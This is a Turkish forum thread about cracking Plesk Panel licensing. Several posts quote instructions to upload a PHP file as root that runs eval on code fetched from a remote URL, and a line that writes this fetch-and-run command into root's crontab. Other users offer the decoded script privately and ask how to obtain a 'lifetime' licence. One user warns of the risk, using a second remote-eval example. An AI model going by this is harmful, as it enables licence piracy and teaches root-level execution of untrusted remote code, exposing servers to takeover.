Plesk Panel 11 Ve Üstü Crack Var Mı?

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    end
    end's avatar
    Kayıt Tarihi: 16/Ekim/2016
    Erkek
    AlbayHardal bunu yazdı

    şöyle olur, ben sunucuda şöyle yapmıştım.

    bir cron.php dosyası oluşturdum ve sftp ile root olarak bağlanıp dosyayı /var/www/html adresine gönderdim. içine de

    eval(file_get_contents('https://plesktrial.yoncu.com/?CMD=x'));
    ?>

    yazdım. sonra da Araçlar ve Ayarlar>Araçlar ve Kaynaklar>Planlanmış Görevler (Cron İşleri)'ne gelip Görev Ekle dedim.

    Görev tipini Bir PHP komut dosyasını çalıştır seçerek "/var/www/html/cron.php" yazdım ve bağımsız değişkenliye de "er" yazdım.

    Çalıştır bölümünden Cron stili olarak seçtiğim yere 0 0 */3 * * yazdım.

    Sonra çalıştır dedim, her 3 günde bir lisansı yeniliyor, güncelleştirmelerde falan da hiçbir sorun olmuyor.

    Scripti inceledim, root olarak bir kere calistirirsan kendisini otomatik cron'a ekliyor zaten.

    Ama sakat bi is, am*ina koyabilirler makinenin. yoncunun bir gondiklenmesine bakar olay. Ya da yoncude calisan birinin bir yamuguna.

    file_put_contents('/var/spool/cron/root',"0\t6\t*\t*\t*\t".$AdminBin."php -er \"eval(file_get_contents('https://plesktrial.yoncu.com/?CMD=x'));\"\t#Yoncu Lisans v1.58\n",FILE_APPEND); 


    0x0480 takilin madem ﷽﷽﷽
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    2021 Talihlisi
    Deleted001
    Deleted001's avatar
    Kayıt Tarihi: 22/Kasım/2020
    Erkek
    end bunu yazdı
    AlbayHardal bunu yazdı

    şöyle olur, ben sunucuda şöyle yapmıştım.

    bir cron.php dosyası oluşturdum ve sftp ile root olarak bağlanıp dosyayı /var/www/html adresine gönderdim. içine de

    eval(file_get_contents('https://plesktrial.yoncu.com/?CMD=x'));
    ?>

    yazdım. sonra da Araçlar ve Ayarlar>Araçlar ve Kaynaklar>Planlanmış Görevler (Cron İşleri)'ne gelip Görev Ekle dedim.

    Görev tipini Bir PHP komut dosyasını çalıştır seçerek "/var/www/html/cron.php" yazdım ve bağımsız değişkenliye de "er" yazdım.

    Çalıştır bölümünden Cron stili olarak seçtiğim yere 0 0 */3 * * yazdım.

    Sonra çalıştır dedim, her 3 günde bir lisansı yeniliyor, güncelleştirmelerde falan da hiçbir sorun olmuyor.

    Scripti inceledim, root olarak bir kere calistirirsan kendisini otomatik cron'a ekliyor zaten.

    Ama sakat bi is, am*ina koyabilirler makinenin. yoncunun bir gondiklenmesine bakar olay. Ya da yoncude calisan birinin bir yamuguna.

    file_put_contents('/var/spool/cron/root',"0\t6\t*\t*\t*\t".$AdminBin."php -er \"eval(file_get_contents('https://plesktrial.yoncu.com/?CMD=x'));\"\t#Yoncu Lisans v1.58\n",FILE_APPEND); 

    Senin için inceledim hocam, kodlarda yamuk yok hatta yayına da verebilirim.

  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    aylmz
    aylmz's avatar
    Kayıt Tarihi: 16/Ocak/2016
    Erkek
    yalinyalniz bunu yazdı
    end bunu yazdı
    AlbayHardal bunu yazdı

     

     

    Senin için inceledim hocam, kodlarda yamuk yok hatta yayına da verebilirim.

    verebilirsen sevinirim


    binin yarısı beş yüz o da bizde yok
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    2021 Talihlisi
    Deleted001
    Deleted001's avatar
    Kayıt Tarihi: 22/Kasım/2020
    Erkek
    aylmz bunu yazdı
    yalinyalniz bunu yazdı
    end bunu yazdı
    AlbayHardal bunu yazdı

     

     

    Senin için inceledim hocam, kodlarda yamuk yok hatta yayına da verebilirim.

    verebilirsen sevinirim

    konu açamıyorum ama özelden decoded php bloğunu verebilirim

  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    aylmz
    aylmz's avatar
    Kayıt Tarihi: 16/Ocak/2016
    Erkek
    yalinyalniz bunu yazdı
    aylmz bunu yazdı
    yalinyalniz bunu yazdı
    end bunu yazdı
    AlbayHardal bunu yazdı

    Senin için inceledim hocam, kodlarda yamuk yok hatta yayına da verebilirim.

    verebilirsen sevinirim

    konu açamıyorum ama özelden decoded php bloğunu verebilirim

    teşekkürler


    binin yarısı beş yüz o da bizde yok
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    2021 Talihlisi
    Deleted001
    Deleted001's avatar
    Kayıt Tarihi: 22/Kasım/2020
    Erkek
    aylmz bunu yazdı
    yalinyalniz bunu yazdı
    aylmz bunu yazdı
    yalinyalniz bunu yazdı
    end bunu yazdı
    AlbayHardal bunu yazdı

    Senin için inceledim hocam, kodlarda yamuk yok hatta yayına da verebilirim.

    verebilirsen sevinirim

    konu açamıyorum ama özelden decoded php bloğunu verebilirim

    teşekkürler

    Rica ederim, blok iletildi.

  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    klomanager
    klomanager's avatar
    Kayıt Tarihi: 13/Ekim/2021
    Dişi

    ömür boyu lisans almak için plesk'ten hangi dosyaların kodunun çözülmesi gerekiyor?

  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    end
    end's avatar
    Kayıt Tarihi: 16/Ekim/2016
    Erkek
    yalinyalniz bunu yazdı
    end bunu yazdı
    AlbayHardal bunu yazdı

    şöyle olur, ben sunucuda şöyle yapmıştım.

    bir cron.php dosyası oluşturdum ve sftp ile root olarak bağlanıp dosyayı /var/www/html adresine gönderdim. içine de

    eval(file_get_contents('https://plesktrial.yoncu.com/?CMD=x'));
    ?>

    yazdım. sonra da Araçlar ve Ayarlar>Araçlar ve Kaynaklar>Planlanmış Görevler (Cron İşleri)'ne gelip Görev Ekle dedim.

    Görev tipini Bir PHP komut dosyasını çalıştır seçerek "/var/www/html/cron.php" yazdım ve bağımsız değişkenliye de "er" yazdım.

    Çalıştır bölümünden Cron stili olarak seçtiğim yere 0 0 */3 * * yazdım.

    Sonra çalıştır dedim, her 3 günde bir lisansı yeniliyor, güncelleştirmelerde falan da hiçbir sorun olmuyor.

    Scripti inceledim, root olarak bir kere calistirirsan kendisini otomatik cron'a ekliyor zaten.

    Ama sakat bi is, am*ina koyabilirler makinenin. yoncunun bir gondiklenmesine bakar olay. Ya da yoncude calisan birinin bir yamuguna.

    file_put_contents('/var/spool/cron/root',"0\t6\t*\t*\t*\t".$AdminBin."php -er \"eval(file_get_contents('https://plesktrial.yoncu.com/?CMD=x'));\"\t#Yoncu Lisans v1.58\n",FILE_APPEND); 

    Senin için inceledim hocam, kodlarda yamuk yok hatta yayına da verebilirim.

    Canımın içi remote url'den aldığın kodu eval ile çalıştırıyorsun.

    Hadi diyelim yöncü çok cici, çok kral bir kuruluş, yamuk yapmaz.

    Oldu ki hacklendi bunlar. Ne olacak :)) crona URL ekliyor çünkü.

    İç içe Base64 olan kısmı decode edip local olarak kullanabilirsin tabii. Onda yamuk olmayabilir. Benim de kastettiğim şey o değil zaten.


    0x0480 takilin madem ﷽﷽﷽
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    2021 Talihlisi
    Deleted001
    Deleted001's avatar
    Kayıt Tarihi: 22/Kasım/2020
    Erkek
    end bunu yazdı

    Canımın içi remote url'den aldığın kodu eval ile çalıştırıyorsun.

    Hadi diyelim yöncü çok cici, çok kral bir kuruluş, yamuk yapmaz.

    Oldu ki hacklendi bunlar. Ne olacak :)) crona URL ekliyor çünkü.

    İç içe Base64 olan kısmı decode edip local olarak kullanabilirsin tabii. Onda yamuk olmayabilir. Benim de kastettiğim şey o değil zaten.

    ben kod temiz dedim, yöncü temiz olacak diye bir iddiam yok :D

    çok emin olmak istenirse, decoded block'taki XML'i plesktrial.yoncu.com'daki XML(base64) ile değişecek otomasyon da yapılabilir :)

  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    end
    end's avatar
    Kayıt Tarihi: 16/Ekim/2016
    Erkek
    yalinyalniz bunu yazdı
    end bunu yazdı

    Canımın içi remote url'den aldığın kodu eval ile çalıştırıyorsun.

    Hadi diyelim yöncü çok cici, çok kral bir kuruluş, yamuk yapmaz.

    Oldu ki hacklendi bunlar. Ne olacak :)) crona URL ekliyor çünkü.

    İç içe Base64 olan kısmı decode edip local olarak kullanabilirsin tabii. Onda yamuk olmayabilir. Benim de kastettiğim şey o değil zaten.

    ben kod temiz dedim, yöncü temiz olacak diye bir iddiam yok :D

    çok emin olmak istenirse, decoded block'taki XML'i plesktrial.yoncu.com'daki XML(base64) ile değişecek otomasyon da yapılabilir :)

    file_put_contents('/var/spool/cron/root',"0\t6\t*\t*\t*\t".$AdminBin."php -er \"eval(file_get_contents('https://plesktrial.yoncu.com/?CMD=x'));\"\t#Yoncu Lisans v1.58\n",FILE_APPEND); 

    Şu koda şu yorumu yaparsan

    "Senin için inceledim hocam, kodlarda yamuk yok"

    çıkan anlam,

    Bunu olduğu gibi güvenle kullanabilirsin tarzıdır bence.

    Yanlış. 

    php -er "eval(file_get_contents('http://diz.icu/plesk?master"));"

    Ekle bakalım bunu cron'a.

    2 hafta php interpreter fatal error verir sonra ansızın sunucuna ulaşamazsın.

    Son kullanıcı olan adam bu riski bilmeli bence.

    end tarafından 13/Eki/21 19:23 tarihinde düzenlenmiştir

    0x0480 takilin madem ﷽﷽﷽
Toplam Hit: 7633 Toplam Mesaj: 33
plesk